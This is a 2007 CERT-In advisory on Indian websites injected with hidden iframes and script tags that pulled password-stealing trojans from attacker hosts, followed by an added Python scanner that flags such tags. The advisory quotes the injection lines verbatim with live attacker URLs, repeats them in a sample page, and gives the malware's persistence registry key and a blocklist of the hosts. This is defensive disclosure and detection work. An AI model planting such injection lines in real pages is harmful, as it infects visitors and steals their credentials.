CERT-In Advisory CIAD-2007-14
Compromised websites propagating Malware
Original issue date: March 13, 2007
Updated: March 22, 2007
Severity Rating: High
Description
It has been reported that some Indian websites have been compromised and links to malicious websites have been injected into these websites. Malware such as Trojans and keyloggers is being downloaded to the systems of users who visited these websites.
The compromised websites were injected with a JavaScript file hosted at “www DOT smeisp DOT cn SLASH images SLASH 163 DOT js”. The script further downloads the malicious file “avp.exe” from the page “www DOT smeisp DOT cn SLASH images SLASH sina DOT htm”. Other malicious locations to which pointers have been planted by the attackers are:
“www DOT smeisp DOT cn SLASH images SLASH avp DOT exe”
“www DOT smeisp DOT cn SLASH images SLASH jc DOT vbs”
Some of the compromised websites were found to have been injected with an iframe through which malware is downloaded from the malicious websites. Some more websites planted to circulate malware were found on 21st March 2007. These malicious websites are given below:
“http: SLASH SLASH jonnyasp DOT com SLASH 1 DOT js”
“www DOT jonnyasp DOT com SLASH test DOT exe”
“www DOT jonnyasp DOT com SLASH 014 DOT htm”
“http: SLASH SLASH 60.28.25.152 SLASH help DOT exe”
“http: SLASH SLASH www DOT google0 DOT info SLASH urchin DOT js”
The following script snippet was found in the source code of compromised websites. (Do not click on the URLs as they may contain malware)
<iframe src="http://smeisp.cn/images/sina.htm" height=0 width=0></iframe>
<script language="javascript1.1" src="http://jonnyasp.com/1.js"></script>
<script language="JavaScript" src="http://www.google0.info/urchin.js"></script>
The websites containing the malicious JavaScript and iframes may have been disinfected, but other websites could be compromised and used to host such malware, infecting innocent users' systems.
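Website administrators checking their own pages for the injection pattern described above can script the check rather than read every page by hand. The scanner below is an added example written for this advisory (it is not a CERT-In tool): it parses saved HTML, flags zero-sized iframes and external script or iframe sources, and raises the severity when the source host is one of the hosts named in this advisory. The site host "www.example.in" and the sample page (which embeds the three injected lines shown above next to two benign elements) are constructed for the example.

```python
"""Scan saved HTML for hidden iframes and script tags pointing at known-bad hosts.

Added example for the advisory above; the blocklist is built from the hosts the
advisory names, the sample page and site host are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the advisory as hosting the injected script or the malware.
BLOCKLIST = {"smeisp.cn", "jonnyasp.com", "google0.info", "60.28.25.152"}


def _on_blocklist(host, blocklist):
    """True when host equals a blocklisted domain or is a subdomain of one."""
    return any(host == b or host.endswith("." + b) for b in blocklist)


def _is_zero(value):
    """True for height/width values written as 0, "0" or "0px"."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return v.strip() == "0"


class InjectionScanner(HTMLParser):
    """Collects <iframe> and <script src> elements that match the injection pattern."""

    def __init__(self, site_host, blocklist):
        super().__init__()
        self.site_host = site_host.lower()
        self.blocklist = {b.lower() for b in blocklist}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        # Inline scripts, relative URLs and same-site resources are not flagged by this rule.
        if not host or host == self.site_host:
            return
        reasons = []
        if _on_blocklist(host, self.blocklist):
            reasons.append("blocklisted host")
        if tag == "iframe" and (_is_zero(a.get("height")) or _is_zero(a.get("width"))):
            reasons.append("hidden iframe (zero size)")
        # Anything external is worth a look; blocklisted or hidden content is high severity.
        severity = "high" if reasons else "review"
        reasons.append("external " + tag)
        self.findings.append({
            "line": self.getpos()[0],   # line of the tag in the scanned file
            "tag": tag,
            "src": src,
            "host": host,
            "severity": severity,
            "reasons": reasons,
        })


def scan_html(html, site_host, blocklist=BLOCKLIST):
    """Return the findings for one page, in document order."""
    scanner = InjectionScanner(site_host, blocklist)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: the three injected lines quoted in the advisory plus a
# local script and a visible third-party iframe, so there is something to keep too.
SAMPLE_PAGE = """<html><head><title>constructed sample page</title>
<script src="/js/site.js"></script>
<script language="JavaScript" src="http://www.google0.info/urchin.js"></script>
</head><body>
<p>Welcome</p>
<iframe src="http://smeisp.cn/images/sina.htm" height=0 width=0></iframe>
<script language="javascript1.1" src="http://jonnyasp.com/1.js"></script>
<iframe src="http://maps.example.org/embed" height=300 width=400></iframe>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE, "www.example.in"):
        print(f"line {f['line']:>3} {f['severity']:<6} <{f['tag']}> {f['host']}: "
              f"{', '.join(f['reasons'])}")
```

Run against a directory of saved pages, the "high" findings are the ones to clean up and to feed back into the perimeter block list; the "review" findings are external resources the site owner should be able to account for, since the attackers in this case used ordinary script and iframe tags rather than anything exotic.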
The malicious files being downloaded are detected as Infostealer.Wowcraft(Symantec), Trojan-PSW.Win32.WOW.pu(Kaspersky), TR/Crypt.FKM.Gen(AntiVir).
The malicious files found on infected PCs are avp.exe, help.exe and test.exe, as shown below:

The malicious file help.exe is detected as Trojan.PWS.WoW.AD(BitDefender), Win32/Lmir.gen(Microsoft), PWS.Win32.OnlineGames.es(Ikarus), w32/SecRisk-ProcessPatcher-Sml-based!Maximus(F-prot), Win32.g2(McAfee).
The file help.exe copies itself into the system32 folder under the name mppds.exe or mppds.dll and, to ensure that it runs at every system startup, creates an entry under the following registry key: “HKLM\Software\Microsoft\CurrentVersion\Run”.
Downloaded file avp.exe is detected as TROJ_DROPPER.CET(Trend Micro). The files dropped by the avp.exe are 1.exe detected as TROJ_MYKILL.AA(Trend Micro) and winboot.exe detected as TROJ_POSSIBLET.G (Trend Micro).
It may be noted that the malicious website keeps an updated copy of the malicious file avp.exe.
On infected systems, a file NTDETECT.exe, which is a copy of avp.exe, has been found in the C: directory.
The downloaded file test.exe is detected as W32/PWstealer.gen1(F-Prot), Win32/Pacex.Gen(NOD32v2), MalwareScope.Worm.Viking.3(Ikarus).
The detection of the malware by some anti-virus vendors, as indicated by 'VirusTotal', is given below:
Activities of the malware after execution are:
- Runs the file avp.exe and drops the malicious file 1.exe at the location from which avp.exe was executed.
- Drops the files winboot.exe and winroot.bat in the C drive.
Users are advised to implement the following countermeasures:
- Install and maintain updated anti-virus software at the gateway and desktop level.
- Keep up to date with patches and fixes for the operating system and application software.
- Disable active scripting, even while visiting trusted websites.
- Set the security level of the Internet zone in Microsoft Internet Explorer to High.
- Block access to the malicious websites/domains at the perimeter level.
Disinfection Tools
If it is suspected that any of the above-mentioned malicious files have been downloaded to a user's system, the following tool may be used to disinfect the system:
ftp://download.trendmicro.com/products/pattern/spyware/fixtool/sysclean.zip
This tool requires the latest pattern file to run. The latest pattern file may be downloaded from the following URL:
http://www.trendmicro.com/download/pattern-cpr-disclaimer.asp
References
http://isc.incidents.org/diary.html?storyid=2397
http://www.symantec.com/security_response/writeup.jsp?docid=2005-073115-1710-99&tabid=2
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_POSSIBLET.G
Disclaimer
The information provided herein is on "as is" basis, without warranty of any kind.
Contact Information

Phone: +91-11-24368572
Postal address
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003